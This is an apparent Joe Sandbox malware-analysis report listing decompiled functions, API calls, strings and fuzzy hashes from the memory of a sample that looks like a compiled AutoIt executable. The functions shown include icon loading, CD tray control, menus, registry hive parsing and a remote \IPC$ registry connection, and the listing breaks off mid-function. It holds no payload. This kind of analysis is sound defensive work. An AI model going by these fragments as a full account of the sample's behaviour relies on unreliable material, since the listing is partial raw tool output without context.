String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 8d9f358eb62ad0bb34d88ae53d750a9e760e37f8d9776fdf0abf26a4dfd27175
Instruction ID: 0e0236b4c46c97c31cf0dbb713ff48a331cee87bf236e34c4e67ecfe596238d6
Opcode Fuzzy Hash: 8d9f358eb62ad0bb34d88ae53d750a9e760e37f8d9776fdf0abf26a4dfd27175
Instruction Fuzzy Hash: 4B9159716043019BCB14EF24C451AAEB7E1AF95354F14986CEC966B3A3DB30FD89DB81

Function 00F1B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F1B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F191C2), ref: 00F1B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F1B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F1B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F1B9C3
FreeLibrary.KERNEL32(?), ref: 00F1B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F1B9DF
DestroyIcon.USER32(?,?,?,?,?,00F191C2), ref: 00F1B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F1BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F1BA17

Part of subcall function 00EB2EFD: __wcsicmp_l.LIBCMT ref: 00EB2F86

Strings

.icl, xrefs: 00F1B82A
.dll, xrefs: 00F1B86D
.exe, xrefs: 00F1B84A

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: e4a9f719968c4e0849feada16e3252634de3674b8824cfacac8757d32fdad05f
Instruction ID: b19afd8ce7fcf5763014515d0c575b1cf8359c3d9d48c136123e0a0793b2620c
Opcode Fuzzy Hash: e4a9f719968c4e0849feada16e3252634de3674b8824cfacac8757d32fdad05f
Instruction Fuzzy Hash: 4061BD71900219FAEB14DF64CC85BFA7BACEF08721F108219FA15E61D1DB749985EBA0

Function 00EF9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00EF9C7F

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EF9CA0
__swprintf.LIBCMT ref: 00EF9CF9
__swprintf.LIBCMT ref: 00EF9D12
_wprintf.LIBCMT ref: 00EF9DB9
_wprintf.LIBCMT ref: 00EF9DD7

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00EF9DB4
Line %d (File "%s"):, xrefs: 00EF9CF3, 00EF9D0C
"%s" (%d) : ==> %s:, xrefs: 00EF9DD2
Incorrect parameters to object property !, xrefs: 00EF9D5B
^ ERROR , xrefs: 00EF9D4E
Error: , xrefs: 00EF9D81

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 5021679b1431c01def6c0f4e706f9a9a71de93e27f63e9f1df26f69184dcbeba
Instruction ID: 4ccee90d899e4b7736317be6a367117eef94dce3fd199855286a6fd31ddce1b3
Opcode Fuzzy Hash: 5021679b1431c01def6c0f4e706f9a9a71de93e27f63e9f1df26f69184dcbeba
Instruction Fuzzy Hash: 0051A17290060DAACF15EBE0CD46EEEBBB8AF14300F601065F64972062EB316F49DB61

Function 00EFA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

CharLowerBuffW.USER32(?,?), ref: 00EFA3CB
GetDriveTypeW.KERNEL32 ref: 00EFA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EFA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EFA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EFA4C5

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

Strings

closed, xrefs: 00EFA3DF, 00EFA3E8
wait, xrefs: 00EFA482
type cdaudio alias cd wait, xrefs: 00EFA443
set cd door , xrefs: 00EFA466
close cd wait, xrefs: 00EFA4B0
open, xrefs: 00EFA3F2
close, xrefs: 00EFA3D1
open , xrefs: 00EFA427

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 0f1c0f2329e071a24335bd787a32bf8c70242ac7a361a8595936c1cb64a310b1
Instruction ID: e49cc643c61b157b4c8522bfa57fe0910c99156f9ca668cb0be4ce5f6aef02af
Opcode Fuzzy Hash: 0f1c0f2329e071a24335bd787a32bf8c70242ac7a361a8595936c1cb64a310b1
Instruction Fuzzy Hash: 21516C711143059FCB04EF24C88196EB7E4FF98758F14986DF89AA7262DB71ED0ACB42

Function 00EEF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00ECE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00EEF8DF
LoadStringW.USER32(00000000,?,00ECE029,00000001), ref: 00EEF8E8

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

GetModuleHandleW.KERNEL32(00000000,00F55310,?,00000FFF,?,?,00ECE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00EEF90A
LoadStringW.USER32(00000000,?,00ECE029,00000001), ref: 00EEF90D
__swprintf.LIBCMT ref: 00EEF95D
__swprintf.LIBCMT ref: 00EEF96E
_wprintf.LIBCMT ref: 00EEFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EEFA2E

Strings

Line %d:, xrefs: 00EEF968
Line %d (File "%s"):, xrefs: 00EEF957
^ ERROR, xrefs: 00EEF9C3
%s (%d) : ==> %s: %s %s, xrefs: 00EEFA12
Error: , xrefs: 00EEF9E5

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 474ad1cad55efddf7baa87efe49b8443f16825425cba166d67a0cd31c0a46bb1
Instruction ID: bbca918480e7b867ae0752b3aaa0cf9878153c2cda959b5c78e8f27b4ed95682
Opcode Fuzzy Hash: 474ad1cad55efddf7baa87efe49b8443f16825425cba166d67a0cd31c0a46bb1
Instruction Fuzzy Hash: 0F413D7290420DBACF05FBE0DD86EEEB7B8AF58340F501065F509B6092EA316F49DB61

Function 00F1BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F19207,?,?), ref: 00F1BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F19207,?,?,00000000,?), ref: 00F1BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F19207,?,?,00000000,?), ref: 00F1BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00F19207,?,?,00000000,?), ref: 00F1BA85
GlobalLock.KERNEL32(00000000), ref: 00F1BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F19207,?,?,00000000,?), ref: 00F1BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00F1BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00F19207,?,?,00000000,?), ref: 00F1BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F19207,?,?,00000000,?), ref: 00F1BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00F22CAC,?), ref: 00F1BAD7
GlobalFree.KERNEL32(00000000), ref: 00F1BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00F1BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F1BB36
DeleteObject.GDI32(00000000), ref: 00F1BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F1BB74

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 452815314f5f3b9d5f21263a1e0b3ffa88fada4fe8ac5f32665c59ea253ee645
Instruction ID: 6f59dc3f627b318417a7b8dfabafef8d00ce9792275b3ea3e5e56415a5ca2736
Opcode Fuzzy Hash: 452815314f5f3b9d5f21263a1e0b3ffa88fada4fe8ac5f32665c59ea253ee645
Instruction Fuzzy Hash: BA410975600208FFDB11DF65DC88EEA7BB8EF89721F118068F90AD7260D7749945EB60

Function 00EFD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00EFDA10
_wcscat.LIBCMT ref: 00EFDA28
_wcscat.LIBCMT ref: 00EFDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EFDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00EFDA63
GetFileAttributesW.KERNEL32(?), ref: 00EFDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00EFDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00EFDAA7

Strings

*.*, xrefs: 00EFDAE6

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: a92c1e31c1dea5df88fe6ee127c278f1dbd595eb9d8a4d99e3a1ee44fbc7f2d5
Instruction ID: 9da1c222b41785e4d5b5c70ee362fc97f07994e48cfeb2480e06c83f69fe4368
Opcode Fuzzy Hash: a92c1e31c1dea5df88fe6ee127c278f1dbd595eb9d8a4d99e3a1ee44fbc7f2d5
Instruction Fuzzy Hash: 7281C4725083489FCB24DFA4CC409BABBE5AFC9314F14682EF989E7251E6B0D944CB52

Function 00F1C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E92612: GetWindowLongW.USER32(?,000000EB), ref: 00E92623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F1C1FC
GetFocus.USER32 ref: 00F1C20C
GetDlgCtrlID.USER32(00000000), ref: 00F1C217
_memset.LIBCMT ref: 00F1C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F1C36D
GetMenuItemCount.USER32(?), ref: 00F1C38D
GetMenuItemID.USER32(?,00000000), ref: 00F1C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F1C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F1C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F1C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F1C489

Strings

0, xrefs: 00F1C33A

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 0aff6c9c66c63520cdd2b9b170b94079042f36dacb3719fb0a80f2f5ad0074f1
Instruction ID: b592d0c2316bc1862834633124559d1b133a044017f5ae46ca3d5e2f9bdbd0f4
Opcode Fuzzy Hash: 0aff6c9c66c63520cdd2b9b170b94079042f36dacb3719fb0a80f2f5ad0074f1
Instruction Fuzzy Hash: 5981B071648315AFDB10CF14C894AEBBBE9FF88724F00492DFA9597291C730D884EB92

Function 00F0731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F0738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F0739B
CreateCompatibleDC.GDI32(?), ref: 00F073A7
SelectObject.GDI32(00000000,?), ref: 00F073B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F07408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F07444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F07468
SelectObject.GDI32(00000006,?), ref: 00F07470
DeleteObject.GDI32(?), ref: 00F07479
DeleteDC.GDI32(00000006), ref: 00F07480
ReleaseDC.USER32(00000000,?), ref: 00F0748B

Strings

(, xrefs: 00F07410

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 78d674c5726c180d32796b9dc3e81dccbac44bce4261d47de0cd8efbd8b4b716
Instruction ID: 0edd2e7dfcde9d4d4e84c831103d53aa5648bd369cf7eea97cffb5cfc6b61d69
Opcode Fuzzy Hash: 78d674c5726c180d32796b9dc3e81dccbac44bce4261d47de0cd8efbd8b4b716
Instruction Fuzzy Hash: 86515975904309EFDB14CFA8CC84EAEBBB9EF48310F14846DF95AA7251C731A944EB50

Function 00E96A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00EB0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E96B0C,?,00008000), ref: 00EB0973

Part of subcall function 00E94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E94743,?,?,00E937AE,?), ref: 00E94770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E96BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00E96CFA

Part of subcall function 00E9586D: _wcscpy.LIBCMT ref: 00E958A5

Part of subcall function 00EB363D: _iswctype.LIBCMT ref: 00EB3645

Strings

Bad directive syntax error, xrefs: 00ECE79D
>>>AUTOIT SCRIPT<<<, xrefs: 00ECE496
Unterminated string, xrefs: 00ECE7E4
AU3!, xrefs: 00E96B61
Error opening the file, xrefs: 00ECE43D, 00ECE4B8
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00ECE421
EA06, xrefs: 00ECE452

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: cebc2bc8295fc91417693e15fd4f5715038b5cef4810aa7c431204f7f11e8875
Instruction ID: c727f0a2032675e3e333526090ed1fcd1c0f1f7ed1ca3e128e9ae9e467cf6dc2
Opcode Fuzzy Hash: cebc2bc8295fc91417693e15fd4f5715038b5cef4810aa7c431204f7f11e8875
Instruction Fuzzy Hash: 8802AD711083409FCB24EF20C881EAFBBE5BF95358F10591EF495A72A2DB31D94ACB52

Function 00EF2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00EF2DDD
GetMenuItemCount.USER32(00F55890), ref: 00EF2E66
DeleteMenu.USER32(00F55890,00000005,00000000,000000F5,?,?), ref: 00EF2EF6
DeleteMenu.USER32(00F55890,00000004,00000000), ref: 00EF2EFE
DeleteMenu.USER32(00F55890,00000006,00000000), ref: 00EF2F06
DeleteMenu.USER32(00F55890,00000003,00000000), ref: 00EF2F0E
GetMenuItemCount.USER32(00F55890), ref: 00EF2F16
SetMenuItemInfoW.USER32(00F55890,00000004,00000000,00000030), ref: 00EF2F4C
GetCursorPos.USER32(?), ref: 00EF2F56
SetForegroundWindow.USER32(00000000), ref: 00EF2F5F
TrackPopupMenuEx.USER32(00F55890,00000000,?,00000000,00000000,00000000), ref: 00EF2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EF2F7E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 591cfb535f02c55a2ace8b6f3f5ce60b388544f75fc5789cfe24383c15c63d11
Instruction ID: 6b079d7596aaf8609e7209958a7663d250a1ae732e865c1ddc0e6563cfc60aed
Opcode Fuzzy Hash: 591cfb535f02c55a2ace8b6f3f5ce60b388544f75fc5789cfe24383c15c63d11
Instruction Fuzzy Hash: D771D17160020DBAEB228F54DC45FFABF65FB04328F24521AF719BA1E1C7715820DB95

Function 00EE77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

_memset.LIBCMT ref: 00EE786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EE78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EE78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EE78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EE7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00EE792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EE7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EE793A

Strings

SOFTWARE\Classes\, xrefs: 00EE780C
\IPC$, xrefs: 00EE7882
\CLSID, xrefs: 00EE7822

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 9d0d61cdbd5f5cd032e69e79b410f933d92c61d6e2bc8b5b5ba8b8b0e97ec15c
Instruction ID: 033c25c747de0e4cf553196e1d5def76fe29acbab9a63a8549c046e8e80ea948
Opcode Fuzzy Hash: 9d0d61cdbd5f5cd032e69e79b410f933d92c61d6e2bc8b5b5ba8b8b0e97ec15c
Instruction Fuzzy Hash: 11411672C1462DABDF15EBA4DC85DEEB7B8BF58310F415029E845B3162EB319E08CB90

Function 00F10E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0FDAD,?,?), ref: 00F10E31

Strings

HKCC, xrefs: 00F10EFF
HKEY_LOCAL_MACHINE, xrefs: 00F10E9A
HKEY_CURRENT_USER, xrefs: 00F10F10
HKEY_USERS, xrefs: 00F10F32
HKEY_CURRENT_CONFIG, xrefs: 00F10EEE
HKCR, xrefs: 00F10ED9
HKEY_CLASSES_ROOT, xrefs: 00F10EC4
HKCU, xrefs: 00F10F21
HKU, xrefs: 00F10F43
HKLM, xrefs: 00F10EAF

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: d6be5047ec9eac65f94403580a16bf5d296a0df1789f297bb89fe35155adc56e
Instruction ID: ee506b7b9063d901a42d81b7287c63801228cb71152a3aec0bddbca7db8a2d4c
Opcode Fuzzy Hash: d6be5047ec9eac65f94403580a16bf5d296a0df1789f297bb89fe35155adc56e
Instruction Fuzzy Hash: EB417F3261434A8BCF10EF10E856AEF37A4FF11314F245815FC552B292DBB0AD9AEB60

Function 00EEF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00ECE2A0,00000010,?,Bad directive syntax error,00F1F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00EEF7C2
LoadStringW.USER32(00000000,?,00ECE2A0,00000010), ref: 00EEF7C9

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

_wprintf.LIBCMT ref: 00EEF7FC
__swprintf.LIBCMT ref: 00EEF81E
